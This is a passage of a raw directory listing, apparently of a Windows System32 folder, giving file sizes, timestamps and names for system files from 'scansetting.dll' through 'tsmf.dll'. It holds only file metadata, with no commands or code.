09/15/2018 07:29:18 scansetting.dll +F 49152 09/15/2018 07:28:59 SCardBi.dll +F 81408 09/15/2018 07:28:59 SCardDlg.dll +F 262656 
09/15/2018 07:28:59 SCardSvr.dll +F 10429 09/15/2018 07:29:46 ScavengeSpace.xml +F 69120 09/15/2018 07:29:46 scavengeui.dll +F 200192 09/15/2018 07:28:59 ScDeviceEnum.dll +F 279040 09/15/2018 07:28:56 scecli.dll +F 515584 09/15/2018 07:28:57 scesrv.dll +F 518144 03/07/2020 00:53:26 schannel.dll +F 25600 09/15/2018 07:28:46 schedcli.dll +F 872448 03/07/2020 00:53:52 schedsvc.dll +F 538 09/15/2018 07:28:39 ScheduleTime_80.contrast-black.png +F 551 09/15/2018 07:28:39 ScheduleTime_80.contrast-white.png +F 538 09/15/2018 07:28:39 ScheduleTime_80.png +F 222720 09/15/2018 07:28:44 schtasks.exe +F 262144 09/15/2018 07:28:59 scksp.dll +F 87040 09/15/2018 07:29:19 scripto.dll +F 22032 09/15/2018 09:10:04 ScriptRunner.exe +F 37888 09/15/2018 07:28:25 scrnsave.scr +F 226304 09/15/2018 07:28:57 scrobj.dll +F 544256 09/15/2018 09:10:00 scrptadm.dll +F 195072 03/07/2020 00:53:45 scrrun.dll +F 24064 09/15/2018 07:28:42 sdbinst.exe +F 49664 09/15/2018 07:29:47 sdchange.exe +F 1219584 03/07/2020 00:54:08 sdclt.exe +F 751616 09/15/2018 07:29:13 sdcpl.dll +F 424960 03/07/2020 00:53:28 SDDS.dll +F 1193984 03/07/2020 00:54:08 sdengin2.dll +F 36200 09/15/2018 07:29:13 SDFHost.dll +F 36352 09/15/2018 07:28:50 sdhcinst.dll +F 211968 09/15/2018 07:29:23 sdiageng.dll +F 25600 09/15/2018 07:29:23 sdiagnhost.exe +F 169472 09/15/2018 07:29:22 sdiagprv.dll +F 52224 09/15/2018 07:29:22 sdiagschd.dll +F 541184 09/15/2018 07:29:18 sdohlp.dll +F 149504 03/07/2020 00:54:08 sdrsvc.dll +F 125440 09/15/2018 07:29:13 sdshext.dll +F 410624 03/07/2020 00:53:39 Search.ProtocolHandler.MAPI2.dll +F 256512 03/07/2020 00:53:39 SearchFilterHost.exe +F 395776 03/07/2020 00:53:45 SearchFolder.dll +F 1051648 03/07/2020 00:53:39 SearchIndexer.exe +F 415744 03/07/2020 00:53:39 SearchProtocolHost.exe +F 59904 09/15/2018 07:28:30 SebBackgroundManagerPolicy.dll +F 1267216 03/07/2020 00:54:25 SecConfig.efi +F 39936 09/15/2018 07:28:56 SecEdit.exe +F 641696 03/07/2020 00:53:54 sechost.dll +F 10752 09/15/2018 07:28:50 
secinit.exe +F 31232 09/15/2018 07:28:56 seclogon.dll +F 120458 09/15/2018 09:10:00 secpol.msc +F 400384 09/15/2018 07:28:25 secproc.dll +F 398848 09/15/2018 07:28:25 secproc_isv.dll +F 112640 09/15/2018 07:28:25 secproc_ssp.dll +F 112640 09/15/2018 07:28:25 secproc_ssp_isv.dll +F 27648 09/15/2018 07:28:56 secur32.dll +F 33792 03/07/2020 00:54:08 SecureBioSysprep.dll +D 0 09/15/2018 07:34:01 SecureBootUpdates +F 652304 03/07/2020 00:53:28 securekernel.exe +F 202752 03/07/2020 00:53:28 SecureTimeAggregator.dll +F 5120 09/15/2018 07:28:56 security.dll +F 5783 09/15/2018 07:28:51 SecurityAndMaintenance.png +F 2613 09/15/2018 07:28:51 SecurityAndMaintenance_Alert.png +F 6873 09/15/2018 07:28:51 SecurityAndMaintenance_Error.png +F 195224 03/07/2020 00:54:18 SecurityCenterBroker.dll +F 41560 09/15/2018 07:29:25 SecurityCenterBrokerPS.dll +F 304952 03/07/2020 00:53:36 SecurityHealthAgent.dll +F 106296 03/07/2020 00:53:36 SecurityHealthProxyStub.dll +F 903368 03/07/2020 00:53:36 SecurityHealthService.exe +F 930816 03/07/2020 00:53:47 SecurityHealthSSO.dll +F 83968 09/15/2018 07:28:39 SecurityHealthSystray.exe +F 41472 09/15/2018 07:28:32 SEMgrPS.dll +F 1247232 09/15/2018 07:28:34 SEMgrSvc.dll +F 110592 09/15/2018 07:28:34 SEMgrSvcPAL.dll +F 138752 09/15/2018 07:29:19 sendmail.dll +F 73728 09/15/2018 07:28:57 Sens.dll +F 14336 09/15/2018 07:28:57 SensApi.dll +F 1269248 09/15/2018 07:28:58 SensorDataService.exe +F 27648 09/15/2018 07:28:53 SensorPerformanceEvents.dll +F 398848 03/07/2020 00:53:43 SensorsApi.dll +F 140800 09/15/2018 07:28:53 SensorsClassExtension.dll +F 1311744 09/15/2018 07:28:53 SensorsCpl.dll +F 433152 03/07/2020 00:53:42 SensorService.dll +F 67144 09/15/2018 07:28:38 SensorsNativeApi.dll +F 139952 09/15/2018 07:28:38 SensorsNativeApi.V2.dll +F 116696 09/15/2018 07:28:38 SensorsUtilsV2.dll +F 148992 03/07/2020 00:53:43 sensrsvc.dll +F 18944 09/15/2018 07:29:23 serialui.dll +F 678376 03/07/2020 00:53:45 services.exe +F 92746 09/15/2018 07:29:22 services.msc 
+F 24576 09/15/2018 07:29:23 serwvdrv.dll +F 482816 03/07/2020 00:54:16 SessEnv.dll +F 75072 09/15/2018 07:29:22 sessionmsg.exe +F 83968 09/15/2018 07:28:44 setbcdlocale.dll +F 299520 09/15/2018 07:28:43 sethc.exe +F 26624 09/15/2018 07:28:55 SetNetworkLocation.dll +F 37376 09/15/2018 07:28:55 SetNetworkLocationFlyout.dll +F 35840 09/15/2018 07:28:55 SetProxyCredential.dll +F 29184 09/15/2018 07:29:21 setspn.exe +F 134144 09/15/2018 07:28:25 SettingMonitor.dll +F 8192 09/15/2018 07:28:26 settings.dat +F 420864 03/07/2020 00:53:49 SettingsEnvironment.Desktop.dll +F 143872 03/07/2020 00:53:45 SettingsExtensibilityHandlers.dll +F 240128 09/15/2018 07:28:24 SettingsHandlers_Accessibility.dll +F 100864 09/15/2018 07:28:43 SettingsHandlers_AppControl.dll +F 154624 03/07/2020 00:53:37 SettingsHandlers_AppExecutionAlias.dll +F 347648 03/07/2020 00:53:31 SettingsHandlers_AssignedAccess.dll +F 151552 03/07/2020 00:53:37 SettingsHandlers_BackgroundApps.dll +F 264704 09/15/2018 07:28:55 SettingsHandlers_BatteryUsage.dll +F 226816 03/07/2020 00:53:38 SettingsHandlers_CapabilityAccess.dll +F 139264 09/15/2018 07:28:25 SettingsHandlers_ClosedCaptioning.dll +F 180224 03/07/2020 00:53:49 SettingsHandlers_ContentDeliveryManager.dll +F 304128 03/07/2020 00:53:49 SettingsHandlers_Cortana.dll +F 670208 03/07/2020 00:53:48 SettingsHandlers_Devices.dll +F 499712 03/07/2020 00:53:49 SettingsHandlers_Display.dll +F 383488 09/15/2018 07:28:25 SettingsHandlers_Flights.dll +F 359424 09/15/2018 07:28:56 SettingsHandlers_Fonts.dll +F 353280 09/15/2018 07:28:39 SettingsHandlers_Gaming.dll +F 222720 03/07/2020 00:53:40 SettingsHandlers_Geolocation.dll +F 217600 09/15/2018 07:28:55 SettingsHandlers_Gpu.dll +F 139264 09/15/2018 07:28:39 SettingsHandlers_InkingTypingPrivacy.dll +F 276480 03/07/2020 00:53:33 SettingsHandlers_InputPersonalization.dll +F 699392 03/07/2020 00:53:49 SettingsHandlers_Language.dll +F 251904 03/07/2020 00:53:49 SettingsHandlers_ManagePhone.dll +F 276992 09/15/2018 07:28:25 
SettingsHandlers_Maps.dll +F 520704 03/07/2020 00:53:49 SettingsHandlers_Notifications.dll +F 4303872 03/07/2020 00:53:45 SettingsHandlers_nt.dll +F 192512 09/15/2018 07:28:25 SettingsHandlers_OneCore_BatterySaver.dll +F 500224 03/07/2020 00:53:48 SettingsHandlers_PCDisplay.dll +F 128000 09/15/2018 07:28:41 SettingsHandlers_Pen.dll +F 169472 09/15/2018 07:28:34 SettingsHandlers_Privacy.dll +F 111616 09/15/2018 07:28:41 SettingsHandlers_QuickActions.dll +F 196608 09/15/2018 07:28:41 SettingsHandlers_Region.dll +F 146432 09/15/2018 07:28:30 SettingsHandlers_SharedExperiences_Rome.dll +F 257024 03/07/2020 00:53:48 SettingsHandlers_SignInOptions.dll +F 200720 03/07/2020 00:53:34 SettingsHandlers_SIUF.dll +F 76288 09/15/2018 07:28:39 SettingsHandlers_SpeechPrivacy.dll +F 155136 09/15/2018 07:28:30 SettingsHandlers_Startup.dll +F 741688 03/07/2020 00:53:34 SettingsHandlers_StorageSense.dll +F 141720 09/15/2018 07:29:22 SettingsHandlers_Troubleshoot.dll +F 538624 03/07/2020 00:53:48 SettingsHandlers_User.dll +F 420864 03/07/2020 00:53:31 SettingsHandlers_UserAccount.dll +F 386560 03/07/2020 00:53:32 SettingsHandlers_WorkAccess.dll +F 482304 03/07/2020 00:53:32 SettingSync.dll +F 1145856 03/07/2020 00:53:46 SettingSyncCore.dll +F 998928 03/07/2020 00:53:46 SettingSyncHost.exe +F 92672 03/07/2020 00:53:32 SettingSyncPolicy.dll +D 0 03/07/2020 00:55:54 setup +F 4704272 03/07/2020 00:53:44 setupapi.dll +F 125440 03/07/2020 00:53:50 setupcl.exe +F 119296 03/07/2020 00:53:46 setupcln.dll +F 22016 09/15/2018 07:28:58 setupetw.dll +F 129024 09/15/2018 07:28:42 setupugc.exe +F 55808 09/15/2018 07:29:14 setx.exe +F 3072 09/15/2018 07:28:45 sfc.dll +F 41984 09/15/2018 07:28:26 sfc.exe +F 50176 09/15/2018 07:28:45 sfc_os.dll +D 0 09/15/2018 07:34:01 Sgrm +F 255128 03/07/2020 00:53:28 SgrmBroker.exe +F 32256 09/15/2018 07:29:13 SgrmClientApi.dll +F 402584 03/07/2020 00:53:28 SgrmEnclave.dll +F 398416 03/07/2020 00:53:28 SgrmEnclave_secure.dll +F 54800 09/15/2018 07:29:13 SgrmLpac.exe 
+F 140800 09/15/2018 07:28:42 shacct.dll +F 70656 09/15/2018 07:28:42 shacctprofile.dll +F 241664 03/07/2020 00:53:48 SharedPCCSP.dll +F 642048 03/07/2020 00:54:17 SharedRealitySvc.dll +F 28672 09/15/2018 07:28:25 SharedStartModel.dll +F 29696 09/15/2018 07:28:30 SharedStartModelShim.dll +F 1035264 03/07/2020 00:53:38 ShareHost.dll +F 242688 09/15/2018 07:29:25 sharemediacpl.dll +F 680944 03/07/2020 00:53:26 SHCore.dll +F 241664 09/15/2018 07:28:58 shdocvw.dll +F 22137120 03/07/2020 00:53:47 shell32.dll +F 529408 03/07/2020 00:53:35 ShellCommonCommonProxyStub.dll +D 0 03/07/2020 00:55:54 ShellExperiences +F 1155584 03/07/2020 00:54:30 shellstyle.dll +F 10752 09/15/2018 07:28:58 shfolder.dll +F 28672 09/15/2018 07:28:50 shgina.dll +F 16740 09/15/2018 07:29:22 ShiftJIS.uce +F 7680 09/15/2018 07:28:42 shimeng.dll +F 33280 09/15/2018 07:28:57 shimgvw.dll +F 329512 09/15/2018 07:28:59 shlwapi.dll +F 20992 09/15/2018 07:28:52 shpafact.dll +F 402944 09/15/2018 07:28:56 shrpubw.exe +F 134656 09/15/2018 07:28:42 shsetup.dll +F 616448 09/15/2018 07:29:14 shsvcs.dll +F 23552 03/07/2020 00:53:46 shunimpl.dll +F 26624 09/15/2018 07:28:50 shutdown.exe +F 30208 09/15/2018 07:28:51 shutdownext.dll +F 276992 09/15/2018 07:28:52 shutdownux.dll +F 455168 09/15/2018 07:28:58 shwebsvc.dll +D 0 09/15/2018 07:34:01 si-lk +F 52736 09/15/2018 07:29:24 signdrv.dll +F 75264 09/15/2018 07:28:55 sigverif.exe +F 287912 03/07/2020 00:54:17 SIHClient.exe +F 109056 03/07/2020 00:53:41 sihost.exe +F 157696 09/15/2018 07:28:22 SimAuth.dll +F 103424 09/15/2018 07:28:24 SimCfg.dll +F 8192 09/15/2018 07:29:20 simpdata.tlb +D 0 09/15/2018 09:09:27 sk-SK +F 294512 03/07/2020 00:53:28 skci.dll +D 0 09/15/2018 09:09:27 sl-SI +F 144384 09/15/2018 07:28:44 slc.dll +F 22528 03/07/2020 00:53:46 slcext.dll +D 0 03/30/2020 08:36:40 SleepStudy +F 20328 09/15/2018 07:28:26 SlideToShutDown.exe +D 0 09/15/2018 09:07:52 slmgr +F 142904 09/15/2018 07:28:57 slmgr.vbs +F 465920 03/07/2020 00:53:52 slui.exe +F 81920 
09/15/2018 07:28:59 slwga.dll +F 69788 09/15/2018 07:28:22 SmallRoom.bin +F 69632 09/15/2018 07:28:32 SmartCardBackgroundPolicy.dll +F 865792 03/07/2020 00:53:46 SmartcardCredentialProvider.dll +F 695296 09/15/2018 07:28:59 SmartCardSimulator.dll +F 2638336 03/07/2020 00:53:37 smartscreen.exe +F 196608 03/07/2020 00:53:37 smartscreenps.dll +F 113664 09/15/2018 07:28:56 SMBHelperClass.dll +F 225792 03/07/2020 00:53:35 smbwmiv2.dll +D 0 09/15/2018 06:09:29 SMI +F 858424 09/15/2018 06:09:27 SmiEngine.dll +F 23552 09/15/2018 07:29:14 smphost.dll +F 75776 03/07/2020 00:54:15 SMSRouter.dll +F 584192 09/15/2018 07:29:24 SmsRouterSvc.dll +F 146888 03/07/2020 00:53:54 smss.exe +F 263120 09/15/2018 07:28:42 SndVol.exe +F 823296 03/07/2020 00:53:51 SndVolSSO.dll +F 3383808 09/15/2018 07:29:22 SnippingTool.exe +F 33280 09/15/2018 07:29:16 snmpapi.dll +F 15872 09/15/2018 07:28:58 snmptrap.exe +F 925 09/15/2018 07:28:39 Snooze_80.contrast-black.png +F 901 09/15/2018 07:28:39 Snooze_80.contrast-white.png +F 925 09/15/2018 07:28:39 Snooze_80.png +F 141824 09/15/2018 07:28:34 socialapis.dll +F 165888 09/15/2018 07:28:44 softkbd.dll +F 10752 09/15/2018 07:28:51 softpub.dll +F 27648 09/15/2018 07:29:14 sort.exe +F 46592 09/15/2018 07:28:53 SortServer2003Compat.dll +F 51200 09/15/2018 07:28:53 SortWindows61.dll +F 72192 09/15/2018 07:28:52 SortWindows6Compat.dll +F 137728 03/07/2020 00:54:18 SpaceAgent.exe +F 177664 03/07/2020 00:54:08 spacebridge.dll +F 742912 03/07/2020 00:54:18 SpaceControl.dll +F 36352 03/07/2020 00:54:08 spaceman.exe +F 171520 03/07/2020 00:53:31 SpatialAudioLicenseSrv.exe +F 256512 03/07/2020 00:53:31 SpatializerApo.dll +F 105984 09/15/2018 07:28:44 spbcd.dll +F 1520 09/15/2018 07:28:22 SpeakersSystemToastIcon.contrast-white.png +F 897 09/15/2018 07:28:22 SpeakersSystemToastIcon.png +F 982528 03/07/2020 00:54:17 Spectrum.exe +F 38400 09/15/2018 07:29:24 SpectrumSyncClient.dll +D 0 09/15/2018 07:33:50 Speech +F 1551360 03/07/2020 00:53:31 SpeechPal.dll +D 0 
09/15/2018 07:33:50 Speech_OneCore +F 104448 09/15/2018 07:28:55 spfileq.dll +F 102400 09/15/2018 07:28:56 spinf.dll +F 11264 09/15/2018 07:28:44 spmpm.dll +F 11776 09/15/2018 07:28:44 spnet.dll +D 0 03/07/2020 10:34:54 spool +F 93184 09/15/2018 07:28:25 spoolss.dll +F 774144 03/07/2020 00:53:33 spoolsv.exe +F 163840 03/07/2020 00:53:52 spopk.dll +D 0 09/15/2018 07:33:50 spp +F 272896 09/15/2018 07:29:13 spp.dll +F 138240 03/07/2020 00:53:52 sppc.dll +F 519168 03/07/2020 00:53:46 sppcext.dll +F 421376 09/15/2018 07:28:45 sppcomapi.dll +F 323072 03/07/2020 00:53:53 sppcommdlg.dll +F 578560 03/07/2020 00:53:46 SppExtComObj.Exe +F 43536 09/15/2018 07:28:44 sppinst.dll +F 199168 09/15/2018 07:28:55 sppnp.dll +F 1751640 03/07/2020 00:53:46 sppobjs.dll +F 4589056 03/07/2020 00:53:46 sppsvc.exe +D 0 09/15/2018 07:34:01 sppui +F 262336 03/07/2020 00:53:46 sppwinob.dll +F 144896 09/15/2018 07:28:59 sppwmi.dll +F 15360 09/15/2018 07:29:24 spwinsat.dll +F 506880 09/15/2018 07:28:58 spwizeng.dll +F 5865272 09/15/2018 07:28:58 spwizimg.dll +F 16912 09/15/2018 07:28:58 spwizres.dll +F 11264 09/15/2018 09:08:37 spwmp.dll +F 140288 09/15/2018 09:08:37 sqlcecompact40.dll +F 205312 09/15/2018 09:08:37 sqlceoledb40.dll +F 920064 09/15/2018 09:08:37 sqlceqp40.dll +F 525824 09/15/2018 09:08:37 sqlcese40.dll +F 745472 09/15/2018 07:29:19 sqlsrv32.dll +F 94208 09/15/2018 07:29:19 sqlsrv32.rll +F 47704 09/15/2018 07:28:44 sqmapi.dll +D 0 09/15/2018 09:09:27 sr-Latn-RS +F 375808 09/15/2018 07:28:57 srchadmin.dll +F 72704 09/15/2018 07:29:25 srclient.dll +F 486912 03/07/2020 00:54:18 srcore.dll +F 18944 09/15/2018 07:29:25 srdelayed.exe +F 5120 09/15/2018 07:29:25 SrEvents.dll +F 3761664 03/07/2020 00:53:51 SRH.dll +F 94208 09/15/2018 07:29:25 srhelper.dll +F 280064 09/15/2018 09:10:00 srm.dll +F 1314816 09/15/2018 09:10:00 srmclient.dll +F 90112 09/15/2018 09:10:03 srmlib.dll +F 18716 09/15/2018 07:29:25 srms-apr.dat +F 58882 03/07/2020 00:54:16 srms.dat +F 638464 09/15/2018 09:10:00 
srmscan.dll +F 171520 09/15/2018 09:10:00 srmshell.dll +F 275968 09/15/2018 09:10:00 srmstormod.dll +F 87040 09/15/2018 09:10:00 srmtrace.dll +F 31744 09/15/2018 09:10:00 srm_ps.dll +F 147968 03/07/2020 00:53:51 srpapi.dll +F 312832 09/15/2018 09:10:05 SrpUxNativeSnapIn.dll +F 249344 03/07/2020 00:54:18 srrstr.dll +F 57856 03/07/2020 00:54:18 SrTasks.exe +D 0 03/30/2020 08:46:00 sru +F 63488 09/15/2018 07:29:13 srumapi.dll +F 214528 03/07/2020 00:53:29 srumsvc.dll +F 112088 09/15/2018 07:28:46 srvcli.dll +F 279040 03/07/2020 00:53:28 srvsvc.dll +F 27136 09/15/2018 07:29:25 srwmi.dll +F 46592 09/15/2018 07:28:45 sscore.dll +F 13312 09/15/2018 07:28:29 sscoreext.dll +F 449536 09/15/2018 07:28:22 ssdm.dll +F 62464 09/15/2018 07:29:13 ssdpapi.dll +F 232448 03/07/2020 00:54:08 ssdpsrv.dll +F 178200 09/15/2018 07:28:46 sspicli.dll +F 29184 09/15/2018 07:28:46 sspisrv.dll +F 132920 09/15/2018 06:09:27 SSShim.dll +F 221184 09/15/2018 07:29:22 ssText3d.scr +F 206848 09/15/2018 07:28:57 sstpsvc.dll +F 5577872 03/07/2020 00:53:35 StartTileData.dll +F 24576 09/15/2018 07:28:50 Startupscan.dll +F 676048 03/07/2020 00:53:25 StateRepository.Core.dll +F 144384 03/07/2020 00:53:31 StaticDictDS.dll +F 65024 09/15/2018 07:28:43 stclient.dll +F 18432 09/15/2018 07:28:22 stdole2.tlb +F 7168 09/15/2018 07:28:55 stdole32.tlb +F 322048 03/07/2020 00:54:12 sti.dll +F 189440 03/07/2020 00:54:15 sti_ci.dll +F 421888 03/07/2020 00:53:34 stobject.dll +F 100352 09/15/2018 07:29:14 StorageContextHandler.dll +F 112640 09/15/2018 07:29:16 StorageUsage.dll +F 2714624 03/07/2020 00:54:08 storagewmi.dll +F 26112 09/15/2018 07:29:14 storagewmi_passthru.dll +F 92672 09/15/2018 07:29:14 stordiag.exe +F 275456 03/07/2020 00:53:41 storewuauth.dll +F 68096 09/15/2018 07:28:44 Storprop.dll +F 988672 03/07/2020 00:54:11 StorSvc.dll +F 27136 09/15/2018 07:28:22 streamci.dll +F 677144 03/07/2020 00:53:25 StructuredQuery.dll +F 93702 09/15/2018 07:29:22 SubRange.uce +F 16384 09/15/2018 07:29:16 subst.exe +F 
676352 03/07/2020 00:54:09 sud.dll +D 0 09/15/2018 09:09:27 sv-SE +F 51696 09/15/2018 07:28:45 svchost.exe +F 13824 09/15/2018 07:29:23 svsvc.dll +F 203264 09/15/2018 07:28:41 SwitcherDataModel.dll +F 456704 09/15/2018 07:28:39 swprv.dll +F 78336 09/15/2018 07:29:13 sxproxy.dll +F 629096 09/15/2018 07:28:44 sxs.dll +F 45568 09/15/2018 07:29:14 sxshared.dll +F 33792 03/07/2020 00:53:53 sxssrv.dll +F 29184 09/15/2018 07:28:44 sxsstore.dll +F 36352 09/15/2018 07:28:44 sxstrace.exe +F 36152 09/15/2018 09:10:04 SyncAppvPublishingServer.exe +F 1720 09/15/2018 07:29:41 SyncAppvPublishingServer.vbs +F 3370496 09/15/2018 07:29:22 SyncCenter.dll +F 632320 03/07/2020 00:54:28 SyncController.dll +F 45568 09/15/2018 07:29:14 SyncHost.exe +F 14336 09/15/2018 07:29:14 SyncHostps.dll +F 410624 09/15/2018 07:29:14 SyncInfrastructure.dll +F 37376 09/15/2018 07:29:14 SyncInfrastructureps.dll +F 61440 09/14/2018 18:02:00 SyncProxy.dll +F 79872 09/15/2018 07:29:14 Syncreg.dll +F 2560 09/14/2018 18:04:00 SyncRes.dll +F 327168 03/07/2020 00:53:32 SyncSettings.dll +F 396288 09/14/2018 17:53:00 syncutil.dll +F 125440 09/15/2018 07:28:55 sysclass.dll +F 337408 09/15/2018 07:28:45 sysdm.cpl +F 1062400 03/07/2020 00:54:18 sysmain.dll +F 484864 09/15/2018 07:29:21 sysmon.ocx +F 25088 09/15/2018 07:28:46 sysntfy.dll +D 0 03/07/2020 10:38:37 Sysprep +F 3317 09/15/2018 07:28:55 sysprint.sep +F 3666 09/15/2018 07:28:55 sysprtj.sep +F 42496 09/15/2018 07:29:22 SysResetErr.exe +F 18944 09/15/2018 07:28:56 syssetup.dll +F 303104 09/15/2018 07:28:45 systemcpl.dll +F 30208 09/15/2018 07:28:26 SystemEventsBrokerClient.dll +F 274432 03/07/2020 00:53:35 SystemEventsBrokerServer.dll +F 102912 09/15/2018 07:29:22 systeminfo.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesAdvanced.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesComputerName.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesDataExecutionPrevention.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesHardware.exe +F 83968 09/15/2018 07:28:44 
SystemPropertiesPerformance.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesProtection.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesRemote.exe +F 522104 03/07/2020 00:54:16 systemreset.exe +D 0 03/07/2020 00:55:55 SystemResetPlatform +F 399376 03/07/2020 00:53:34 SystemSettings.DataModel.dll +F 165376 09/15/2018 09:10:03 SystemSettings.DeviceEncryptionHandlers.dll +F 1262592 03/07/2020 00:53:45 SystemSettings.Handlers.dll +F 164152 03/07/2020 00:53:50 SystemSettings.SettingsExtensibility.dll +F 495616 03/07/2020 00:53:47 SystemSettings.UserAccountsHandlers.dll +F 496872 03/07/2020 00:53:47 SystemSettingsAdminFlows.exe +F 205072 09/15/2018 07:28:25 SystemSettingsBroker.exe +F 40744 09/15/2018 07:29:14 SystemSettingsRemoveDevice.exe +F 4018688 03/07/2020 00:53:47 SystemSettingsThresholdAdminFlowUI.dll +F 55808 09/15/2018 07:28:30 SystemSupportInfo.dll +F 82432 09/15/2018 07:28:30 SystemUWPLauncher.exe +F 10752 09/15/2018 07:28:25 systray.exe +F 180224 03/07/2020 00:53:57 t2embed.dll +D 0 09/15/2018 07:34:01 ta-in +D 0 09/15/2018 07:34:01 ta-lk +F 165888 09/15/2018 07:29:22 Tabbtn.dll +F 77312 09/15/2018 07:29:22 TabbtnEx.dll +F 83456 09/15/2018 07:29:22 tabcal.exe +F 699904 09/15/2018 07:29:22 TabletPC.cpl +F 229376 03/07/2020 00:53:53 TabSvc.dll +F 62976 09/15/2018 07:29:23 takeown.exe +F 980992 09/15/2018 07:29:22 tapi3.dll +F 234496 09/15/2018 07:29:22 tapi32.dll +F 32768 09/15/2018 07:29:22 tapilua.dll +F 65024 09/15/2018 07:29:22 TapiMigPlugin.dll +F 12288 09/15/2018 07:29:22 tapiperf.dll +F 310784 03/07/2020 00:54:16 tapisrv.dll +F 13312 09/15/2018 07:29:22 TapiSysprep.dll +F 109056 09/15/2018 07:29:22 tapiui.dll +F 14848 09/15/2018 07:29:22 TapiUnattend.exe +F 50688 09/15/2018 07:29:16 tar.exe +F 408576 09/15/2018 07:28:34 TaskApis.dll +F 945152 09/15/2018 07:28:25 taskbarcpl.dll +F 478720 03/07/2020 00:53:52 taskcomp.dll +F 1308672 03/07/2020 00:53:31 TaskFlowDataEngine.dll +F 86744 03/07/2020 00:53:52 taskhostw.exe +F 95744 09/15/2018 07:29:23 
taskkill.exe +F 101376 09/15/2018 07:29:23 tasklist.exe +F 1390888 03/07/2020 00:53:50 Taskmgr.exe +D 0 03/30/2020 08:36:37 Tasks +F 773208 03/07/2020 00:53:52 taskschd.dll +F 145059 09/15/2018 07:28:44 taskschd.msc +F 59392 09/15/2018 07:28:44 TaskSchdPS.dll +F 64000 03/07/2020 00:53:37 tbauth.dll +F 49072 09/15/2018 07:28:25 tbs.dll +F 758928 03/07/2020 00:53:28 tcblaunch.exe +F 203064 03/07/2020 00:53:28 tcbloader.dll +F 16384 09/15/2018 07:29:21 tcmsetup.exe +F 1673 09/15/2018 07:28:55 tcpbidi.xml +F 239616 09/15/2018 07:28:56 tcpipcfg.dll +F 37888 09/15/2018 07:28:55 tcpmib.dll +F 223232 09/15/2018 07:28:56 tcpmon.dll +F 60124 09/15/2018 07:28:56 tcpmon.ini +F 71680 09/15/2018 07:28:55 tcpmonui.dll +F 12800 09/15/2018 07:29:14 TCPSVCS.EXE +F 84992 09/15/2018 07:29:16 tdc.ocx +F 773632 03/07/2020 00:53:24 tdh.dll +F 293376 03/07/2020 00:53:41 TDLMigration.dll +F 109056 09/15/2018 07:29:22 telephon.cpl +F 91648 03/07/2020 00:53:47 TelephonyInteractiveUser.dll +F 2560 09/15/2018 07:28:39 TelephonyInteractiveUserRes.dll +F 3629568 03/07/2020 00:54:26 tellib.dll +F 76800 09/15/2018 07:28:36 TempSignedLicenseExchangeTask.dll +F 424448 09/15/2018 07:29:22 termmgr.dll +F 1019392 03/07/2020 00:54:16 termsrv.dll +F 79872 09/15/2018 07:28:34 tetheringclient.dll +F 52736 09/15/2018 07:28:34 tetheringconfigsp.dll +F 13312 09/15/2018 07:28:34 TetheringIeProvider.dll +F 235008 03/07/2020 00:53:41 TetheringMgr.dll +F 246784 03/07/2020 00:53:42 tetheringservice.dll +F 222720 09/15/2018 07:28:25 TetheringStation.dll +F 603792 03/07/2020 00:53:40 TextInputFramework.dll +D 0 03/07/2020 00:55:55 th-TH +F 2500096 09/15/2018 07:29:23 themecpl.dll +F 67584 09/15/2018 07:28:44 themeservice.dll +F 2893312 03/07/2020 00:53:53 themeui.dll +F 68096 09/15/2018 07:28:30 threadpoolwinrt.dll +F 386360 03/07/2020 00:53:39 thumbcache.dll +F 34304 09/15/2018 07:28:58 ThumbnailExtractionHost.exe +D 0 09/15/2018 07:34:01 ti-et +F 2560 09/15/2018 07:28:43 tier2punctuations.dll +F 20480 09/15/2018 
07:29:23 TieringEngineProxy.dll +F 310272 09/15/2018 07:29:23 TieringEngineService.exe +F 547840 03/07/2020 00:53:42 TileDataRepository.dll +F 35840 09/15/2018 07:28:29 TimeBrokerClient.dll +F 174592 09/15/2018 07:28:29 TimeBrokerServer.dll +F 513536 09/15/2018 07:28:24 timedate.cpl +F 11776 09/15/2018 07:28:53 TimeDateMUICallback.dll +F 31232 09/15/2018 07:29:22 timeout.exe +F 14848 09/15/2018 07:28:25 TimeSyncTask.dll +F 44544 09/15/2018 07:29:23 tlscsp.dll +F 49664 09/15/2018 07:28:46 tokenbinding.dll +F 1466368 03/07/2020 00:53:37 TokenBroker.dll +F 36864 09/15/2018 07:28:29 TokenBrokerCookies.exe +F 71680 03/07/2020 00:53:53 TokenBrokerUI.dll +F 144862 09/15/2018 07:28:25 tpm.msc +F 3584 09/15/2018 07:28:25 TpmCertResources.dll +F 45056 09/15/2018 07:28:25 tpmcompc.dll +F 882176 03/07/2020 00:53:33 TpmCoreProvisioning.dll +F 70656 09/15/2018 07:28:25 TpmInit.exe +F 60416 03/07/2020 00:53:34 TpmTasks.dll +F 384512 09/15/2018 07:29:46 tpmvsc.dll +F 106496 09/15/2018 07:28:58 tpmvscmgr.exe +F 135680 09/15/2018 07:28:58 tpmvscmgrsvr.exe +F 3334144 03/07/2020 00:53:39 tquery.dll +D 0 09/15/2018 09:09:27 tr-TR +F 415232 09/15/2018 07:29:20 tracerpt.exe +F 17920 09/15/2018 07:29:16 TRACERT.EXE +F 42496 09/15/2018 07:28:56 traffic.dll +F 10576 09/15/2018 07:28:26 TransformPPSToWlan.xslt +F 1688 09/15/2018 07:28:26 TransformPPSToWlanCredentials.xslt +F 58880 09/15/2018 07:28:22 TransliterationRanker.dll +F 495632 03/07/2020 00:53:30 TransportDSA.dll +F 19968 09/15/2018 07:29:16 tree.com +F 173568 09/15/2018 07:28:22 trie.dll +F 113152 09/15/2018 07:28:42 trkwks.dll +F 120832 09/15/2018 07:28:50 TrustedSignalCredProv.dll +F 16896 09/15/2018 07:29:21 tsbyuv.dll +F 219136 03/07/2020 00:54:26 tscfgwmi.dll +F 23552 09/15/2018 09:10:03 tscon.exe +F 23552 09/15/2018 09:10:03 tsdiscon.exe +F 12288 09/15/2018 09:09:58 TSErrRedir.dll +F 63488 09/15/2018 07:29:22 tsgqec.dll +F 24064 09/15/2018 09:10:03 tskill.exe +F 410616 03/07/2020 00:54:17 tsmf.dll +F 145408 03/07/2020 
